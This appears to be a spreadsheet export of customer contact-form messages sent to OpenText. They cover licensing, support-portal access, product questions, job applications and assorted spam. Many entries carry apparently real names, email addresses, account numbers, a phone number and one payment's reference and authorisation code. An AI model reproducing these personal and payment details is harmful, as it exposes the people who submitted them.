    <t>We have a First Class Maintenance and Support agreement with Aptiris for many years now. My question is are there yearly license fees for users and server, and what are those fees? Is there support that can be purchased from OpenText if we needed assistance, if we are no longer supported by Aptiris?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Alicia</t>
  </si>
  <si>
    <t xml:space="preserve">OTCS Ticket 4086291 - trying to download demo versions recommended by Shweta Parihar_x000D_
of the OpenText Support Team per his email:_x000D_
That means the installation has not completed properly, and I am wondering how are you seeing the same logs as you mentioned AnalyticsDesigner\configuration\  folder does not exists, I am saying this because org.eclipse.osgi package is inside this path, and I see the error from these package in your logs._x000D_
1) Can you please conform the java version of this machine?_x000D_
2) Please try to install the designer in your local machine and let me know if that works, if that works this will confirm that the issue is specific to the machine. _x000D_
3) Also  try to install a different version of designer and see if you see the same issue, below are the links to download designer version 16, 16.2 and 3.1, please try to install these and see if you are able to install any of these. Make sure to use different folders while installing them._x000D_
</t>
  </si>
  <si>
    <t>Need for learning.</t>
  </si>
  <si>
    <t>Do we have a contract with you?  Account # 064034-001</t>
  </si>
  <si>
    <t>Would it be possible to obtain a copy of the EnCase v8.04 manual in .pdf form?</t>
  </si>
  <si>
    <t xml:space="preserve">Need to speak to someone regarding upgrading to a new version of BizLink and also discuss legacy information on Secure Link.  </t>
  </si>
  <si>
    <t xml:space="preserve">Good Mourning,_x000D_
My Name is Maximiliano Medina, I´m manager of the line of business of Digital transformation at Datecsa. We are a company mainly focused on document management, but we also have other lines of business related to media management. We are the biggest Kyocera partner in Latin America, and second biggest Hyland partner in Colombia. We have presence in the 7 main cities in Colombia (Bogotá, Medellín, Cali, Barranquilla, Manizales, Pereira y Bucaramanga), which give us the opportunity to cover the whole country._x000D_
_x000D_
The reason I´m writing to you is because y we looking to represent another platform in Colombia, and off course, you would be our first choice. We think there is a big opportunity to grow together in this market. Please let me know if this sounds interesting to you and let me know when we could talk about it._x000D_
Regards,_x000D_
Maximiliano Medina L._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact me at aingram@mcphersonoil.com. I need assistance with the TrustedLink software. Thank you, Adam Ingram </t>
  </si>
  <si>
    <t>I am attempting to reach out for support with our Easy Link VAN.  Is there a phone number that I should use or can I access support online?  I currently receive an error when accessing the My Support portal even though I registered and confirmed the request via a link in the email that I received.</t>
  </si>
  <si>
    <t>I need an email address for the person that handles invoices/billing for Macy's. We are going to be sending an email communication out explaining the new instructions on how to bill us. Thank you.</t>
  </si>
  <si>
    <t>Have a user who had a fax number in the past but it seems like it was removed at some point_x000D_
The number was 17327094137 _x000D_
I was just curious if there was a way to reclaim this number and re-create his account in the console. _x000D_
Any assistance would be appreciated_x000D_
Thanks</t>
  </si>
  <si>
    <t>We currently use Opentext versions 8.0 and 9.5.  my question is can we install more than one version of opentext on a single PC.  Please Advise.  Your assistance is greatly appreciated.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to renew a portion of the SOCKS Client 12 licenses that I purchased last year around this time. We purchased 22 licenses in Feb and 1 in May of last year. My first question is whether or not pricing differs between renewing a portion of our current licenses and purchasing new ones. If it does and renewing is the cheaper option, am I able to only renew a portion of last years licenses?_x000D_
_x000D_
Thanks,_x000D_
David Lessard </t>
  </si>
  <si>
    <t xml:space="preserve">Hi this is Venkat working for UBS Financial Services from New Jersy. We are currently in process of upgrading Exstream from version 9.0 to version 16.04.305. Can you please guide me how to find the zip file with Raw software. So that I can install it as well as use it for central packaging. </t>
  </si>
  <si>
    <t xml:space="preserve">May I know where i can register for internship in Opentext?  </t>
  </si>
  <si>
    <t xml:space="preserve">We need a quote for an OCR project. </t>
  </si>
  <si>
    <t>I'm based in London, UK. We are in the process of selecting a Document Management system and would like to consider OpenText. Would it be possible to see the product?</t>
  </si>
  <si>
    <t>Hi, _x000D_
This company recently purchased 2 licenses of EnCase Forensics (dongles G3002093295 and G3002093296). The product box shipped didn't have any software. Where can we download it?_x000D_
_x000D_
Best regards.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like some information on your integration with Nextgen and enterprise solutions. I would also like to talk about setting up a demo for myself and members of my team. </t>
  </si>
  <si>
    <t>We have Exceed 4 on a 2008 server which requires an parallel upgrade to Windows 2012 server.  I have only and empty box and serial number from the original product to work from.  Please would someone contact me to assist?  Thank you.  Tom</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to change my password as I am getting prompted with an error. Please advise._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
Hope you’re doing well!_x000D_
_x000D_
My name is Alice, would you be interested in purchasing our updated and permission based Assistive Technology Industry Decision Makers Email List across USA, Canada &amp; Australia._x000D_
_x000D_
In Our List Every Lead Includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few sample data for your reference and please let me know would you like reach the below mentioned target market criteria?_x000D_
_x000D_
•	Telecare and Telehealth Manager / Director / Owner_x000D_
•	Chief Information Officer_x000D_
•	Technology Director / Manager_x000D_
•	Medical Director / Manager_x000D_
•	Innovation and Development Engineer / Manager_x000D_
•	IT Director / Manager_x000D_
•	Service Manager / Director_x000D_
•	Project Manager / Engineer_x000D_
•	Assistive Technology Engineer / Consultant_x000D_
•	Facility and Maintenance Manager / Engineer and others_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Alice Wilson_x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: alice.wl@chief-exhibitus.com_x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Opt Out"._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are having issues setting up OpenText and connecting with SAP. We currently have it working on Windows 7 but are planning on migrating to windows 10 and we are testing image capture centre/validation and enterprise scan however the profiles we have setup dont seem to work with windows 10. Can you please advise?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Good Morning, I am inquiring about a US government approved fax server solution and I have seen that OpenText Right fax is DoD approved for testing and certification. I am looking for technical info about Right Fax and how it can fit our environment and cost estimates if possible so that I can create a statement of work to send out to bid for vendors approved to contract with DoD.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in your Enterprise Content Management system. Can someone please call me ?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I'm intrestring in the product for acces a linux application remot (ETX) what is the price for one license and how is it works. It's for 25 users to login on an application running on a server._x000D_
_x000D_
When you have questions send me a email please_x000D_
_x000D_
Best Regards_x000D_
Ruben Huisman</t>
  </si>
  <si>
    <t>I am attempting to register on the 'EnCase App Central Developer Network' (www_guidancesoftware_com/app/become-a-developer) however the form contains an error.  It states 'Country is required'. I have attempted various values without success (UK, England, U.K, etc)</t>
  </si>
  <si>
    <t>I can´t access to download software</t>
  </si>
  <si>
    <t>Good Morning_x000D_
I would like to have a comercial apresentation of the ECM plataform. We intent to buy a ECM for our enterprise.</t>
  </si>
  <si>
    <t>We employ a couple of software engineers who would like to receive some training on OpenText Documentum  and OpenText StreamServe(Exstream) in Dutch. I cannot find a training service provider in Utrecht region in the Netherlands. Please advise.</t>
  </si>
  <si>
    <t>We have been using EnCase for the last Two years with SIX(06) Licenses. But now we are facing problem for Registration Process with following message_x000D_
"No Access_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
We are also not able to receive further updates for these SIX(06) Licensed versions._x000D_
Kindly provide necessary support and guidance in this regard at the earliest.</t>
  </si>
  <si>
    <t>Please quote price for_x000D_
_x000D_
OpenText Exceed v15 single user</t>
  </si>
  <si>
    <t>have verified email but not letting me access support area to log a ticket</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - our current version of RightFax isn't compatible with Office 365. Are you able to confirm what we need to do to get a version that is?_x000D_
thanks,_x000D_
matt </t>
  </si>
  <si>
    <t>My name is Volodymyr, I am a priest who serves children with disabilities, homeless children and various elderly people, and I ask you to help me in my village, a small country and a poor country with 73 rooms. In general, as a priest, I want to develop a village, people, children, youth and build up, but I can not, because I can not, because it is very financially difficult. I ask you to tell it to your friends so that they can share with friends who can also help me promise you, as a priest, your name will be written in my village:_x000D_
 What do I want to do as a priest?_x000D_
1) I want to make and restore the Church so that Christians, children, can come and pray before God._x000D_
2) I would like to create a school for children so that they can learn and receive knowledge;_x000D_
3) the creation of a playground;_x000D_
4) poor children, orphans, widows, people with special needs, deaf people need help._x000D_
Allow me, according to my request, to fall into your heart so that we all respond to it, sincerely sacrifice God's plan. Thank you in advance, I promise you, parents, children, grandchildren, pray for them, and I will always remember them in prayer! Who can help, do not turn away from the plan of God, with respect, priest Volodymyr!</t>
  </si>
  <si>
    <t>Hi, Thank you for your mail, my question originally was how to check my application status on Open Text portal which I don't seem to find. Is it possible to provide me guidance on how to check it? please feel free to call me.I am unable to check the status on the portal, thanks.</t>
  </si>
  <si>
    <t>Hi Sephora's EDI team,_x000D_
_x000D_
Currently, we are getting error notifications from donotreplay@opentext.com and PARIS38-SEP02.SEPHORAUS.COM@sephora.com._x000D_
_x000D_
Could you please add following email addresses to all EDI connections between Sephora and Foreo? Please add following emails for all Sephora's and Foreo's entities (US and Canada)._x000D_
_x000D_
LIST OF EMAILS TO BE ADDED:_x000D_
miro.vuletin@foreo.com_x000D_
osdev@foreo.com_x000D_
edi@foreo.com_x000D_
damir.davarovic@foreo.com_x000D_
_x000D_
Could you please notify us after adding emails?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
-- _x000D_
Miro Vuletin_x000D_
EDI Manager</t>
  </si>
  <si>
    <t>Can I have access to OT knowledge center?</t>
  </si>
  <si>
    <t xml:space="preserve">This is sunny from opentext support team, documents which are stuck in_x000D_
scanned status can caused by archive document not available you can_x000D_
check on /n/opt/vim_7ax8 are able to view the image._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need training on SAP Vendor Information Management </t>
  </si>
  <si>
    <t>Need Connect with Talent Acquisition Team to discuss on IT Recruitment</t>
  </si>
  <si>
    <t>Re: Websites Promotion_x000D_
_x000D_
Hello,_x000D_
 _x000D_
Trust you are doing very well,_x000D_
 _x000D_
Do you want to see your website in Top 10 position in Google?_x000D_
 _x000D_
If yes, please let us know your domain name which you want to optimize. We will run analysis on your website and no cost and send full report with all the points and where your website is missing._x000D_
 _x000D_
Please let me know your website URL then we will get back to you with our report on your website._x000D_
 _x000D_
Thanks &amp; Regards,_x000D_
John Smith_x000D_
johnseocarner@gmail.com</t>
  </si>
  <si>
    <t>SO</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am unable to find out to download link for evaluation of Actuate iHUB for "Scheduled and distribution by email" of reports in my company. i downloaded your product from different resources but all are expired._x000D_
_x000D_
Kindly give me direct link for download it and also describe the extend policy of evaluation period._x000D_
_x000D_
Regards,_x000D_
M Salman_x000D_
</t>
  </si>
  <si>
    <t>I applied for a role with Open Text for Manger HR Shared Services and wanted to know the status of my application but unable to check on the portal. Can someone please help me with the status of my application, thanks.</t>
  </si>
  <si>
    <t>Is there any job vacancies for experienced candidates into finance ?</t>
  </si>
  <si>
    <t>Hi, I want to know about the costs of the LMS FirstClass_x000D_
_x000D_
Thank your</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I'm Kristi and I'm a senior at University of Texas doing research for my internship over managed service providers (MSP) and vendor management systems/software (VMS). I'm collecting data over which companies use a MSP and/or VMS and collecting data over what companies are the most popular for these services. _x000D_
_x000D_
I am emailing to ask if you could disclose if you are using a MSP and/or VMS and which company provides that service for you. Any information you could give would be extremely helpful. _x000D_
_x000D_
Thank you, _x000D_
Kristi Nguyen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Buenas noches nesesito una cotizaccion sobre los costos de sus servicios gracias._x000D_
</t>
  </si>
  <si>
    <t>I tried your trial install and would now like to cancel any subscriptions. Thank you.</t>
  </si>
  <si>
    <t>I am interested in getting Pixtools SDK</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Jackson, a talented freelance copywriter. I’m a big fan of tech solutions that deliver rapid ROI for business. _x000D_
_x000D_
Regular blogging on your website can help you to increase your search engine rankings. I'm working on a few content ideas that your audience would like, and I’d love to hear take on it._x000D_
_x000D_
Title_x000D_
Top Content Management Systems for Better Workflow In 2019_x000D_
_x000D_
Abstract_x000D_
When it comes to business operations, time is practically as valuable as the currency of your paycheck. The more time your employees spend boggled down by administrative duties associated with paper such as walking to the printer, fax machine, and filing cabinets, the lesser time they have at work to do what really matters. Every business looking to improve their return on investment (ROI) should not only endeavor to reduce this paper-based work but also increase access to their important documents from anywhere and at any time. Nothing beats content management software here. In this post, we shall explore top content management systems you may consider for better workflow in 2019._x000D_
_x000D_
Title_x000D_
How Does Content Management Systems (CMS) Reduce Costs?_x000D_
Abstract_x000D_
If your business still relies on manual and paper-based processes, you’re probably spending too much on basic operational costs. For an average company, document volume doubles every three years, which translates to an annual paper increase of 22%. As such, creating and storing paper documents can be expensive. The price of paper alone has been skyrocketing over the years, not to mention the cost of folders, filing cabinets, shelving, archive boxes, printing, copying, and toner! In this post, we will explore how CMS enables you to reduce your operational costs and improve productivity._x000D_
_x000D_
It would be a pleasure to write for you. Looking forward to hearing from you._x000D_
_x000D_
Many thanks,_x000D_
Jackson._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Vhhh</t>
  </si>
  <si>
    <t>Gjj</t>
  </si>
  <si>
    <t>AD</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Manager position in Open Text._x000D_
_x000D_
	Efficiently handling 13 Production Editors of Editorial Team and total 26 during co-team lead’s absence_x000D_
	Progressed Production Editorial team – Project leads, Production editors from inception to business as usual_x000D_
	Transitioned 9 FTEs to Hyderabad_x000D_
	Was instrumental in designing the Metrics for all the transitioned processes in PE Team_x000D_
	Have working knowledge of all sub-processes in Production Editorial Team_x000D_
	Initiated training plan for PE Team which reduced learning curve from 5 to 3 months_x000D_
	Transitioned management of 1 major migration from UK (L2 Migration)_x000D_
	Trained 26 members each on different processes transitioned_x000D_
	Took Analytical Codes and Regulations teams from inception to business as usual_x000D_
	Lead the HGC Codes and Regulations training team (Hawaii) and streamlined the process_x000D_
</t>
  </si>
  <si>
    <t>I'D LIKE TO KNOW THE PRICES OF THE MEMBERSHIP, PLEASE.</t>
  </si>
  <si>
    <t>I am trying to access the My support /Knowledge modules . But its asking for confirming the email every time although I have done so .I work for TCS and I need access for the all the information on ECM documentum product . Please help me quickly on this . Please let me know if any confirmation required from TCS, also please provide me the contact name from TCS.</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
I  live in London and want to enquire about below courses_x000D_
Can you provide me option to attend these Courses/Certification ?_x000D_
1. If Onsite in london,Uk_x000D_
2. If Can be done as Online training and Certification to follow(Preferably)_x000D_
_x000D_
I would like to know the cost,schedule,venue for each courses &amp; its certification_x000D_
_x000D_
Thanks_x000D_
Sameer Vaid</t>
  </si>
  <si>
    <t xml:space="preserve">I'm very interested to work in your organisation </t>
  </si>
  <si>
    <t>MD474174@GMAIL PayPal me</t>
  </si>
  <si>
    <t>I want to know more about DMS.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am unable to upload my resume to apply for a job: the Google drive upload link does not work and there don't seem to be any alternative methods. _x000D_
_x000D_
Could someone please assist? </t>
  </si>
  <si>
    <t>I've been a long term user of your product for medical data collection - at Cleveland Clinic Florida. Now am starting 2 new offices, one in Fort Lauderdale (USA) and another in Nepal. Am interested in launching the same program at both institutions. Please provide me 2 quotes - one for each location. I will need the hardware and software at both locations. THX and please do not call me until afterFeb 19 as am in Nepal.</t>
  </si>
  <si>
    <t>Our organization is a reseller hardware and sofware._x000D_
Questions about the product  OpenText Exceed PS._x000D_
	1. Can we buy license for this product  without maintenance? Our client has already purchased the product previously (approximately in 2017) without maintenance. (the client only needs the ability to download)._x000D_
2.Can we purchase this product directly? The fact is that the supplier, on whose proposal we were guided by negotiations with the client, stopped responding to our requests. Another offers delivery only with maintenance and significantly more expensive. Interested in 2 licenses.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I (Prabakaran), currently working as an EDI test engineer in Cognizant Technology Solutions._x000D_
I feel excited with what OpenText is doing in the current market. And I also would like to contribute to the future success of Opentext. I am willing to become an EDI developer and to work in Technological side._x000D_
_x000D_
So, I request you to grant me an opportunity to be a part of Open text._x000D_
_x000D_
Thanks and Regards,_x000D_
Prabakaran</t>
  </si>
  <si>
    <t>What value do I have to you</t>
  </si>
  <si>
    <t>ARE YOU PROVIDING TRAINING IN INDIA FOR ENCASE SOFTWARE. PLEASE GIVE DETAILS OF  YOUR TRAINING SUCH AS DURATION, PLACE, FEE ETC.</t>
  </si>
  <si>
    <t>Ommy Exhibition is a professional custom booth building company located in Las Vegas. Our company makes exhibiting easier, saving our clients time and money creating stunning exhibits! We would like to offer OpenText  a complimentary booth design for the upcoming 2019 DAC Show in Las Vegas. Please feel free to contact myself and or visit our website. Thanks, Donald C.</t>
  </si>
  <si>
    <t>Greetings,_x000D_
I want to start this training course:DF120: Foundations in Digital Forensics with OpenText™ EnCase™ Forensic_x000D_
_x000D_
Do I need to have a EnCase hardware/software prior to starting the course? Can EnCase/OpenText provide a test environment for me to perform the training if I do not already have the EnCase equipment?_x000D_
_x000D_
Thank you,_x000D_
Bryan Baker</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get a copy of the EnCase 8.08 users manual.  The link that you sent me during the release of the update sends me to this page.  </t>
  </si>
  <si>
    <t xml:space="preserve">I need assistance regarding the catalog for Kate Spade.  I received an error that I am not familiar with._x000D_
   Error    Count  Description_x000D_
   -21201      1    Input string length greater than maximum size for this field_x000D_
  If this field is too long, then I need to know the maximum size for it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for a quote for a/ licenses b/ profserv required to move off OnDemand / iSeries.</t>
  </si>
  <si>
    <t>Interested in document management product.  I submitted one of these in early December and never heard back.  Please contact to schedule call/meeting.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous souhaitons avoir de l'information ou une présentation sur votre produit pour gérer les sites Web (CMS). Nous sommes présentement en analyse et nous sommes en train de faire le tour des leaders dans cette catégorie. Notre site arrive en fin de vie technologique et nous devons trouver une solution pour le supporter._x000D_
_x000D_
Merci à l'avance_x000D_
Mathieu Hautot</t>
  </si>
  <si>
    <t>Testing.</t>
  </si>
  <si>
    <t>Im on page 15/16 of the OpenText rightFax 16 EP4 Installation Guide. Step 1 reads "On the RightFax Activation page, click Launch Product Licensing Utility."  is this something i do via a web interface ? or do i have to do it via the server itself?  _x000D_
_x000D_
The server administrators installed the software on the server and im  just trying to figure out how i can begin the configuration._x000D_
_x000D_
thanks,_x000D_
Cesar Guerra</t>
  </si>
  <si>
    <t xml:space="preserve">REBOOT MY FAX. ITS NOT WORKING </t>
  </si>
  <si>
    <t>I need to give you a new credit card number for our monthly charges. Please phone me</t>
  </si>
  <si>
    <t>We received an invoice (1902858059) for account (858059).  I called yesterday and left a message but have not received a call back.  We are needing to get more information on this such as which office this was opened for, what exactly it is for, and possibly who opened it.  Please let me know if you have any questions._x000D_
_x000D_
Thank You,_x000D_
Brittany Hertenstein</t>
  </si>
  <si>
    <t>My company purchased a copy of Redact-It Desktop with DCF + ocr - Single user Non royalty 16.2  Now the computer we have been using it on is at the end of its lifetime and we are looking to move the license from an old computer to the new one, however the employees who did this work no longer works for our agency. I have the software ID ad Software pin, but I cannot access the location on the support page. I request help with this. Please let me know what I must do to obtain the software and any knowledge base I need to put this software on the new computer._x000D_
_x000D_
Thank you,_x000D_
Jim Webster</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are conducting a review of Windows 10 Vendor Support on the products in our environment._x000D_
_x000D_
I have been tasked with identifying if you support the software below running in Windows 10:_x000D_
_x000D_
IGC 4Projects View and Markup tool 3G _x000D_
IGC Brava! Enterprise Client 7.1_x000D_
_x000D_
If not, what are the risks/issues associated with running in Windows 10?_x000D_
If not, what is the minimum version that you do support under Windows 10?</t>
  </si>
  <si>
    <t>Hi, I'm inquiring on what is the process to get private training (Québec City),</t>
  </si>
  <si>
    <t>I am unable to submit a ticket.  I do not know why, there is no information other than "cannot submit ticket".</t>
  </si>
  <si>
    <t xml:space="preserve">I'm evaluating different DAMs for implementation at IBI Group and I wanted more in-depth understanding of what Open Text's solution. </t>
  </si>
  <si>
    <t>salve, sto cercando un software OpenText edocs dm server v5.3.1 lingua italiana. Dove posso comprarlo?? Grazie</t>
  </si>
  <si>
    <t xml:space="preserve">I am a graduate student working for the Center for Sales and Customer Relationship Management at Rawls College of Business. We are developing our center to train students for various challenges that they might face in different industries. I was wondering if you have any promotions for academic classrooms and teaching. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I've registered an account and confirmed my email address. The email says I now have access to My Support - which I'm hoping will allow me to register new dongles and d/l the software. When clicking the link it tells me I have No Access.</t>
  </si>
  <si>
    <t xml:space="preserve"> error code RP104. Please remove me from the email</t>
  </si>
  <si>
    <t>Former VP of HR for Covisint, which has since been acquired by OpenText. Hoping to get an employment verification letter and need a HR contact. Can you please help?_x000D_
Thank you,_x000D_
Lillian</t>
  </si>
  <si>
    <t>The site says we do not have access to technical support.  I know we pay for support.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We sold for our customer "Universidad Autónoma de Bucaramanga" Encase Forensic solution, it was purchased trough Digital Intelligence, unfortunately the customer's email that was registered is no longer available, so the data and instructions for registration and installation is not available._x000D_
_x000D_
How can we get that information again?, when we try to register, the form ask for "Product Line", "End User Number", "Name of co-worker", "System ID/serial number/PIN/VPS"; but the customer didn't receive it._x000D_
_x000D_
Customer information:_x000D_
End User:  Elsy Paez Ortiz_x000D_
Universidad Autonoma de Bucaramanga_x000D_
Email:  compras@unab.edu.co  (this email is not available right now)_x000D_
_x000D_
Thanks a lot for your help.</t>
  </si>
  <si>
    <t>Migrating to a new computer and registration code is not valid.  Can you please help?</t>
  </si>
  <si>
    <t xml:space="preserve">We're a new Life Insurance Company, having split off from The Hartford. I'm working on standing up our new IT infrastructure, which includes looking for a new Enterprise e-fax solution. We also have IBM multi-function printers that will incorporate fax capabilities so i'd like to see what options might be available for those devices. We're currently about 500 employees. </t>
  </si>
  <si>
    <t>Dear all,_x000D_
_x000D_
we are in process of evaluation DMS solutions for internal process in Adacta group for (Croatia, Slovenia, Serbia)._x000D_
These are some of our requirements:_x000D_
- Digital signatures_x000D_
- Worklfow automation with hierarchy options_x000D_
- Metadata addition based on OCR scanning of contracts, invoices_x000D_
- Open API for export of OCR scanned invoices, invoice lines to ERP solution_x000D_
- GDPR Regulation supported_x000D_
_x000D_
Additional information of interest:_x000D_
- Local support possible ?_x000D_
- Price list for cloud and on-premise version_x000D_
- Availability for demo ?_x000D_
_x000D_
best regards,_x000D_
Andrej Kožić_x000D_
+385914007029</t>
  </si>
  <si>
    <t xml:space="preserve">We require OpenText Blazon. _x000D_
_x000D_
The recommended tool to convert the unreadable PDF to readable format is OpenText Blazon._x000D_
</t>
  </si>
  <si>
    <t>I believe you send faxes to some of our clients based on files received from us. I worked for the line of business using this feature and am wondering if I could talk to someone about other methods of delivering these messages as our some of our clients would like a change.</t>
  </si>
  <si>
    <t>Hello,  I am in need of some assistance in completing a verification of employment request.  Could you please provide an email address of fax where I can send the request to?_x000D_
_x000D_
thank you.</t>
  </si>
  <si>
    <t>I submitted a payment for my Annual Training Passport upgrade using the Quotation Reference Number: 00625571 from the pdf rather than 625571 as specified in a separate email with instructions._x000D_
_x000D_
Can someone please assist in determining whether my payment went/will go through or if it needs to be cancelled/re-entered again? I'm eager to start training on-demand today._x000D_
_x000D_
The payment confirmation details are:_x000D_
Payment Reference Number: AG0C2C3382E4_x000D_
Auth Code: 110914_x000D_
Payment Date: 07 Feb 2019 09:01:28_x000D_
Total Payment Amount: 995.00 USD_x000D_
_x000D_
Thank you-_x000D_
Chris</t>
  </si>
  <si>
    <t xml:space="preserve">Where does the title "How are you" comes from when a .pdf is sent to an Outlook message from your application "OpenText Imaging Windows Viewer" ?_x000D_
A .pdf is generated from SAP (it has a normal name until that point) but when I choose to _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm interested in learning more about RightFax. Specifically the cost and on-boarding process for a private physician practice of 17 doctors across 12 satellite locations and one main office. We utilize Epic, I'd like information on the integration module too.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I am running into an issue with the .msi installer that I downloaded for rightfax and the silent parameters that go with it. I am assuming the .msi can only be used silently? Whenever i double click on it, it states that I need to use the setup.exe one. I am not sure if the installer itself is corrupt or if I am not entering in the silent parameters correctlu_x000D_
_x000D_
Here is what I am using:_x000D_
_x000D_
msiexec.exe /i "RightFax Product Suite - Client.msi" /qn REBOOT=ReallySuppress RUNBYRIGHTFAXSETUP=2 CONFIGUREFAXCTRL=1 CONFIGUREADOBEREADER=1 CONFIGUREFAXUTIL=1 ADDLOCAL="FaxUtil,FaxCtrl,OutlookAdvancedAddIn" INSTALLDIR="C:\Program Files\RightFax" RFSERVERNAME=RightFaxHQ /log "c:\network\RightFax.log"_x000D_
_x000D_
Whenever its convenient, can we please schedule an appointment to troubleshoot this?</t>
  </si>
  <si>
    <t>My client New avon is going to upgrade the OS version to  z/os 2.2 and z/os 2.3 please let us know the opentext Expedite Base /MVS with version 4.6.1 is compatible  or not</t>
  </si>
  <si>
    <t>im unable to link my Account with following account._x000D_
We urgently need to download software._x000D_
my ID:  Andres.Brunner@credi-suisse.com_x000D_
Account:  10105592_x000D_
_x000D_
Thanks for help</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText support,_x000D_
_x000D_
we bought Brava DWG Viewer, but im not able to access the My Support area to download the software. Could you please grand the access for this account ?_x000D_
_x000D_
Thanks in advance,_x000D_
Simon_x000D_
</t>
  </si>
  <si>
    <t>Hello, I already sent twice a demo request but nothing comes back in one week (7-8 days). Is there any eDiscovery tool that we can see? thank you and have a nice week end. Adrian</t>
  </si>
  <si>
    <t>We are trying to download the Invoice Capture Center 7.0 SP3 client package but not able to find it.  I am downloading a patch and attempting to launch the installer (directly) setup.exe and getting the error: The upgrade patch cannot be installed by the Windows Installer service because the program to be upgraded may be missing.  Verify that the program to be upgraded exists on the computer and you have the correct upgrade patch.  _x000D_
_x000D_
Can you please help us with the base installation package for Invoice Capture Center 7.0?_x000D_
_x000D_
-Regards,_x000D_
Ravindra</t>
  </si>
  <si>
    <t>As part of a global project, Volvo Group is checking the different options in the market for a reliable Digital HR Document Management system._x000D_
I am now searching for contacts (name and emails) to forward them to the Project Owners in order to evaluate the market offers._x000D_
We used to have Daymara Soto as contact, could you please confirm and forward her email address and phone number?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I completed the form to get access to the Gartner Magic Quadrant for Content Services Platforms 2018. The email I get in response thanks me for my interest and agreeing to the storing &amp; processing of personal data but there is no link to download the report._x000D_
Gillian</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
We are exploring the impact of the changes to Java licensing for our software portfolio. Please would it be possible for you to clarify whether Exceed / Exceed 3D:_x000D_
_x000D_
1)            Utilises Java and how it utilises it (e.g. is it embedded?)_x000D_
2)            Which version it uses and the roadmap for future software releases and which version of Java they will be using_x000D_
3)            Will the software work with OpenJDK?_x000D_
4)            Will we be required to purchase Java licences to utilise the software?_x000D_
5)            Will the Java licencing be covered by the supplier?_x000D_
_x000D_
Any assistance would be much appreciated_x000D_
_x000D_
Julia_x000D_
</t>
  </si>
  <si>
    <t>Hello Madame / Sir,_x000D_
_x000D_
I’m Cloud Consultant collaborating for a consulting firm, we are looking to migrate ACTUATE software as SaaS cloud product._x000D_
_x000D_
For this concern, we request from you following details regarding the SaaS equivalent product of ACTUATE software: _x000D_
_x000D_
	Does SaaS equivalent product for ACTUATE software exist?_x000D_
	If the SaaS equivalent product exists, could you please share with us the price brochure? _x000D_
        &gt; Example: price per month / per service level / per number of users / per number of requests._x000D_
	Also, If SaaS equivalent product exists, would you please describe the migration effort ?_x000D_
        &gt; Example: Process, Tooling, Migration Cost, etc._x000D_
_x000D_
Looking forward to hearing from you,_x000D_
Regards,</t>
  </si>
  <si>
    <t>Hello Madame / Sir,_x000D_
_x000D_
I’m Cloud Consultant collaborating for a consulting firm, we are looking to migrate ACTUATE software as SaaS cloud product._x000D_
_x000D_
For this concern, we request from you following details regarding the SaaS equivalent product of ACTUATE software: _x000D_
_x000D_
	Does SaaS equivalent product for ACTUATE software exist ?_x000D_
	If the SaaS equivalent product exists, could you please provide cloud hosting datacenters locations? (inside EU borders or outside)_x000D_
	Also, If the SaaS equivalent product exists, could you please share with us the price brochure? _x000D_
        &gt; example: price per month / per service level / per number of users / per number of requests._x000D_
_x000D_
Looking forward to hearing from you,_x000D_
Regards,</t>
  </si>
  <si>
    <t>Dear support,_x000D_
_x000D_
we were purchasing the tableau T7U with all the PCIE(s) ,_x000D_
_x000D_
i am using the PCIe M.2 SSD and everything is already connected,but the Tableau T7u does not detect the SSD card that i attached. kindly advice.I am sure that the SSD works well but it does not detect._x000D_
_x000D_
regards,_x000D_
Aziyah Sabtu</t>
  </si>
  <si>
    <t>Hello , Good day !_x000D_
_x000D_
I am Ian Moraga a web security researcher,_x000D_
_x000D_
I know that this is a straight forward question but does your site launches a bug bounty program or similar to that ? Also, If I submit to you a report that contains a vulnerability on your site ( ex : XSS , RCE , CSRF, SSRF, SQLi and etc. ) , do you give a monetary reward or any reward for that ?_x000D_
_x000D_
